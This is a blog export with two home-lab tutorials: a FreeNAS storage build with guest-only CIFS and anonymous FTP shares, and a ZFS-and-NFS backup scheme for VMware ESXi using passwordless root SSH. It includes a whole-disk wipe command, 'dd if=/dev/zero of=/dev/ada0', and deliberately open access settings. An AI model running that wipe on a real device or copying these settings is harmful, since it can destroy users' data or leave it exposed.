On FreeNAS menu select shell and wipe your internal SSD to avoid "error 19" issues due left over junk. Check device name for SSD using "camcontrol devlist", in my case it was "ada0". Then overwrite it using "dd if=/dev/zero of=/dev/ada0 bs=4096". This will take around 15 minutes at 4MB/s rate that internal SSD is capable. After dd completes type "reboot" and boot PC again from FreeNAS USB install stick.<br />
<br />
Follow install instructions, there's actually only one prompt - where to install which is obviously our internal SSD. After install go to BIOS settings and disable USB boot so only thing PC can boot from is our internal SSD.<br />
<br />
On first boot after install FreeNAS will fetch IP from DHCP which is shown on console after bootup is complete. You can also set fixed IP now if you don't have or don't like DHCP.<br />
<br />
Next open web browser and connect to IP of FreeNAS.<br />
- Set admin password when prompted<br />
- Login will be "root"<br />
<br />
- System > System Information > Edit hostname<br />
-- Enter name and domain for device<br />
<br />
- System > Settings > General<br />
-- Set keymap and timezone<br />
<br />
- System > Settings > Advanced<br />
-- Check "Enable powerd"<br />
-- Set "Swap size on each drive" to 4<br />
-- Check "Show console messages"<br />
-- Check "Show advanced fields"<br />
-- Check "Enable autotune"<br />
-- Uncheck "Enable automatic upload of crash dumps"<br />
<br />
- System > Tunables > Add Tunable<br />
-- Variable: xhci_load<br />
-- Value: YES<br />
-- Comment: Enable USB3 support<br />
<br />
- System > Tunables > Add Tunable<br />
-- Variable: vfs.zfs.prefetch_disable<br />
-- Value: 0<br />
-- Comment: Enable ZFS prefetch with <4GB RAM<br />
<div>
<br /></div>
<div>
Click Shutdown from bottom left, connect USB3 disks and restart PC. Then login again to web interface.</div>
<div>
<br /></div>
<div>
- System > SMART Tests > Add SMART Test</div>
<div>
-- Disks: da0 and da1</div>
<div>
-- Type: Long Self-Test</div>
<div>
-- Description: Do long self-test every month</div>
<div>
-- Hour > Each selected hour: 03</div>
<div>
-- Day > Each selected day: 15</div>
<div>
<br /></div>
<div>
- Storage > Volumes > View Disks</div>
<div>
-- Select both disks and click Edit in Bulk</div>
<div>
-- HDD Standby: 10</div>
<div>
-- Power Management: Level 64</div>
<div>
-- Acoustic Level: Maximum</div>
<div>
<br /></div>
<div>
- Storage > Volumes > ZFS Volume Manager</div>
<div>
-- Volume Name: pool</div>
<div>
-- add both disks</div>
<div>
-- Layout: Mirror</div>
<div>
<br /></div>
<div>
- Storage > Volumes > /mnt/pool > Create ZFS Dataset</div>
<div>
-- Dataset Name: datat</div>
<div>
-- Enable atime: Off</div>
<div>
<br /></div>
<div>
<div>
<div>
<div>
- Storage > Volumes > /mnt/pool > Create ZFS Dataset</div>
<div>
-- Dataset Name: scratch</div>
<div>
-- Enable atime: Off</div>
<div>
<br /></div>
</div>
</div>
</div>
<div>
<div>
- Storage > Volumes > /mnt/pool > Create ZFS Dataset</div>
<div>
-- Dataset Name: spycam</div>
<div>
-- Compression level: Off</div>
<div>
-- Enable atime: Off</div>
<div>
-- Quota for dataset: 200G</div>
<div>
<br /></div>
</div>
<div>
<div>
- Storage > Volumes > /mnt/pool/datat > Change Permissions</div>
<div>
-- Mode: Owner, Group and Other R/W/X</div>
</div>
<div>
<div>
<div>
<br /></div>
<div>
- Storage > Volumes > /mnt/pool/scratch > Change Permissions</div>
<div>
-- Mode: Owner, Group and Other R/W/X</div>
</div>
</div>
<div>
<div>
<div>
<br /></div>
<div>
- Storage > Volumes > /mnt/pool/spycam > Change Permissions</div>
<div>
-- Mode: Owner, Group and Other R/W/X</div>
</div>
</div>
<div>
<br /></div>
<div>
- Storage > Periodic Snapshot Tasks > Add Periodic Snapshot</div>
<div>
-- Volume/Dataset: pool/datat</div>
<div>
-- Lifetime: 52 Weeks</div>
<div>
-- Begin: 01:00:00</div>
<div>
-- End: 05:00:00</div>
<div>
-- Interval: 1 day</div>
<div>
-- Weekday: Select all days</div>
<div>
<br /></div>
<div>
<div>
- Storage > Periodic Snapshot Tasks > Add Periodic Snapshot</div>
<div>
-- Volume/Dataset: pool/scratch</div>
<div>
-- Lifetime: 1 Week</div>
<div>
-- Begin: 01:00:00</div>
<div>
-- End: 05:00:00</div>
<div>
-- Interval: 1 day</div>
<div>
-- Weekday: Select all days</div>
</div>
<div>
<br /></div>
<div>
<div>
- Services > SMART</div>
<div>
-- Power mode: "Standby"</div>
<div>
<br /></div>
<div>
- Services > FTP</div>
</div>
<div>
-- Clients: 10</div>
<div>
-- Connections: 10</div>
<div>
-- Login attempts: 10</div>
<div>
-- Check "Allow anonymous"<br />
<div>
-- Path: /mnt/pool/spycam</div>
<div>
-- File permissions: Owner, Group and Other R/W</div>
<div>
-- Directory permissions: Owner, Group and Other R/W/X</div>
</div>
<div>
- Services > Control Services</div>
<div>
-- Toggle CIFS to ON</div>
<div>
-- Toggle FTP to ON</div>
<div>
<br /></div>
<div>
<div>
- Sharing > Windows CIFS > Add share</div>
<div>
-- Name: DATAT</div>
<div>
-- Path: /mnt/pool/datat</div>
<div>
-- Check "Allow Guest"</div>
<div>
-- Check "Only Allow Guest"</div>
<div>
<br /></div>
<div>
<div>
- Sharing > Windows CIFS > Add share</div>
<div>
-- Name: SCRATCH</div>
<div>
-- Path: /mnt/pool/scratch</div>
<div>
-- Check "Allow Guest"</div>
<div>
-- Check "Only Allow Guest"</div>
<div>
<br /></div>
</div>
</div>
<div>
<div>
<div>
- Sharing > Windows CIFS > Add share</div>
<div>
-- Name: SPYCAM</div>
<div>
-- Path: /mnt/pool/spycam</div>
<div>
-- Check "Allow Guest"</div>
<div>
-- Check "Only Allow Guest"</div>
<div>
<br /></div>
</div>
</div>
<div>
- System > Settings</div>
<div>
-- Save Config and place backup in safe place</div>
<div>
<br /></div>
</div>
</div>
</div>
<div>
Performance? Enough to fill 100Mbit/s uplink to Aruba A200 WLAN controller. Which is far more than two-to-four hop long 802.11g 54Mbit/s WLAN mesh clients are connected to can handle. Performance does plummet hard with multiple clients and random I/O but that doesn't matter much in this case.</div>
<div>
<br /></div>
<div>
Reliability? Dunno. Pulling USB cable while there's I/O didn't hurt and disk is promptly dropped from ZFS. Plugging cable back won't bring it back so reboot is required. Resilver speed was around 22MB/s and scrubbing ok disks runs at ~45MB/s. Had to trigger that manually after reboot. I also tried pulling power cable and FreeNAS recovered ok from it.</div>
<div>
<br /></div>
<div>
<div>
Done? Close enough. Should setup SMTP alerts to catch failing disks tho.</div>
</div>
<div>
<br /></div>
asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com0tag:blogger.com,1999:blog-6586814948089606304.post-50788116747162521362015-12-11T11:31:00.001+02:002015-12-11T11:31:15.842+02:00Backup VMware ESXi to Linux with ZFSLowest budget backups for your free VMware ESXi hypervisor.<br />
<br />
<a name='more'></a><div>
- Install server with bunch of disks and Ubuntu 14.04. Use mdraid-1 for OS disks.</div>
<div>
<br />
- Install ZFS support<br />
<span style="font-family: Courier New, Courier, monospace;">apt-add-repository -y ppa:zfs-native/stable</span><br />
<span style="font-family: Courier New, Courier, monospace;">apt-get update</span><br />
<span style="font-family: Courier New, Courier, monospace;">apt-get -y install ubuntu-zfs</span><br />
<br />
- Create RAID-Z2 (double parity) zpool<br />
<span style="font-family: Courier New, Courier, monospace;">zpool create data raidz2 \</span><br />
<span style="font-family: Courier New, Courier, monospace;"> /dev/disk/by-id/ata-ST31000340NS_9QJ6ZHJJ \</span><br />
<span style="font-family: Courier New, Courier, monospace;"> /dev/disk/by-id/ata-ST31000340NS_9QJ718FG \</span><br />
<span style="font-family: Courier New, Courier, monospace;"> /dev/disk/by-id/ata-WDC_WD1002FBYS-02A6B0_WD-WMATV7379900 \</span><br />
<span style="font-family: Courier New, Courier, monospace;"> /dev/disk/by-id/ata-WDC_WD10EACS-00ZJB0_WD-WCASJ0857564 \</span><br />
<span style="font-family: Courier New, Courier, monospace;"> /dev/disk/by-id/ata-WDC_WD10EACS-00ZJB0_WD-WCASJ0945918 \</span><br />
<span style="font-family: Courier New, Courier, monospace;"> -o ashift=12 -o failmode=continue</span><br />
<br />
- Create filesystem with compression (and deduplication if you feel brave)<br />
<span style="font-family: Courier New, Courier, monospace;">zfs set atime=off data</span><br />
<span style="font-family: Courier New, Courier, monospace;">zfs create data/backup</span><br />
<span style="font-family: Courier New, Courier, monospace;">zfs set compression=on data/backup</span><br />
<span style="font-family: Courier New, Courier, monospace;">#zfs set dedup=on data/backup</span><br />
<br />
- Install NFS server<br />
<span style="font-family: Courier New, Courier, monospace;">apt-get -y install nfs-kernel-server</span><br />
<br />
- Export new ZFS filesystem to VMware ESXi<br />
<span style="font-family: Courier New, Courier, monospace;">mkdir /data/backup/esx</span><br />
<span style="font-family: Courier New, Courier, monospace;">echo "/data/backup 10.0.0.11(rw,async,no_subtree_check,no_root_squash)" >>/etc/exports</span><br />
<span style="font-family: Courier New, Courier, monospace;">exportfs -rv</span><br />
<span style="font-family: Courier New, Courier, monospace;">service nfs-kernel-server restart</span><br />
<br />
- Mount new NFS export to VMware (Config > Storage > Add Storage > NFS > enter Linux server IP, /data/backup as path and BACKUP as name.<br />
<br />
- Create SSH key on Linux, just answer with enter to all questions<br />
<span style="font-family: Courier New, Courier, monospace;">ssh-keygen</span><br />
<br />
- Copy /root/.ssh/id_rsa.pub to /data/backup<br />
<span style="font-family: Courier New, Courier, monospace;">cp /root/.ssh/id_rsa.pub /data/backup</span><br />
<br />
- Enable SSH remote access to ESXi, see VMware docs for details if you haven't already done this<br />
- Login to ESXi using SSH<br />
<span style="font-family: Courier New, Courier, monospace;">ssh root@10.0.0.11</span><br />
<br />
- Enable passwordless SSH logins (following commands are entered on ESXi shell)<br />
mv /vmfs/volumes/BACKUP/id_rsa.pub /etc/ssh/keys-root/authorized_keys<br />
<span style="font-family: Courier New, Courier, monospace;">chmod 0400 /etc/ssh/keys-root/authorized_keys</span><br />
<br />
- Logout from ESXi shell and reconnect using SSH. You should now be able to login without password.<br />
<br />
- Install ghettoVCB (enter rest of command on Linux side, not esx shell)<br />
<span style="font-family: Courier New, Courier, monospace;">cd /data/backup</span><br />
<span style="font-family: Courier New, Courier, monospace;">wget https://github.com/lamw/ghettoVCB/archive/master.tar.gz</span><br />
<span style="font-family: Courier New, Courier, monospace;">tar xvzf master.tar.gz</span><br />
<span style="font-family: Courier New, Courier, monospace;">mv ghettoVCB-master scripts</span><br />
<span style="font-family: Courier New, Courier, monospace;">rm -f master.tar.gz</span><br />
<br />
- Create config file and keep weekly backups for entire year<br />
<span style="font-family: Courier New, Courier, monospace;">mv ghettoVCB.conf ghettoVCB.conf.dist</span><br />
<span style="font-family: Courier New, Courier, monospace;">cat <<'_EOF_'>ghettoVCB.conf</span><br />
<span style="font-family: Courier New, Courier, monospace;">VM_BACKUP_VOLUME=/vmfs/volumes/BACKUP/esx/</span><br />
<span style="font-family: Courier New, Courier, monospace;">DISK_BACKUP_FORMAT=thin</span><br />
<span style="font-family: Courier New, Courier, monospace;">VM_BACKUP_ROTATION_COUNT=52</span><br />
<span style="font-family: Courier New, Courier, monospace;">_EOF_</span><br />
<br />
- Schedule backups<br />
<span style="font-family: Courier New, Courier, monospace;">cat <<'_EOF_'>>/etc/crontab</span><br />
<span style="font-family: Courier New, Courier, monospace;"># Backup ESXi every Saturday night</span><br />
<span style="font-family: Courier New, Courier, monospace;">5 1 * * Sat root (ssh root@10.0.0.11 -C '/vmfs/volumes/BACKUP/scripts/ghettoVCB.sh -a -g /vmfs/volumes/BACKUP/scripts/ghettoVCB.conf') >>/data/backup/esx/logi 2>>/data/backup/esx/logi</span><br />
<span style="font-family: Courier New, Courier, monospace;">_EOF_</span><br />
<div>
<span style="font-family: Courier New, Courier, monospace;">service cron restart</span></div>
<div>
<br /></div>
- Do first run manually so we don't need to wait until Saturday<br />
<span style="font-family: Courier New, Courier, monospace;">ssh root@10.0.0.11 -C '/vmfs/volumes/BACKUP/scripts/ghettoVCB.sh -a -g /vmfs/volumes/BACKUP/scripts/ghettoVCB.conf'</span><br />
<br />
<br />
<br />
<div>
<br /></div>
</div>
asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com0